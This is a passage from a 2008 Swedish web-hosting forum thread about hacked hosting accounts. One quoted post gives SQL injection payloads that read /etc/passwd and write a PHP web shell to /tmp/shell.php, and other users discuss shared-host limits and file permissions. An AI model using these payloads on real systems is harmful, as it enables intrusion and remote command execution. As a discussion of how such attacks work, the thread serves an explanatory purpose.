WN
Sidan 3 av 3 12 3
Visa 40 inlägg från det här ämnet på en sida

WN (https://www.wn.se/forum/index.php)
-   Webbhotell (https://www.wn.se/forum/forumdisplay.php?f=13)
-   -   Mitt andra webbhotell hackat efter Proinet (https://www.wn.se/forum/showthread.php?t=27383)

tartareandesire 2008-02-28 14:30
Citat:
Ursprungligen postat av SimonP
Citat:
Ursprungligen postat av tartareandesire
SQL Injections kan endast påverka databasen (såvida man inte kommer åt annan information därigenom då).
Ifall det finns tillräckliga rättigheter på databasen kan man både läsa och skapa filer med SQL injektioner.
T.ex för att läsa en fil:
SELECT LOAD_FILE(/etc/passwd);
Skapa:
SELECT ?php system(_GET[cmd]); ? INTO DUMPFILE /tmp/shell.php;
Mjo, iofs, men jag tror väl de flesta webbhotell inte tillåter det på delade burkar?

clirre 2008-02-28 15:15
Vad bör man ha för rättigheter på kataloger och filer? Jag har aldrig ändrat grundinställningen på dem men blir lite osäker nu när de ändrats av hackermiffot och jag själv ändrat tillbaka.

allstars 2008-02-28 16:34
nej


Alla tider är GMT +2. Klockan är nu 12:17.
Sidan 3 av 3 12 3
Visa 40 inlägg från det här ämnet på en sida

Programvara från: vBulletin® Version 3.8.2
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Svensk översättning av: Anders Pettersson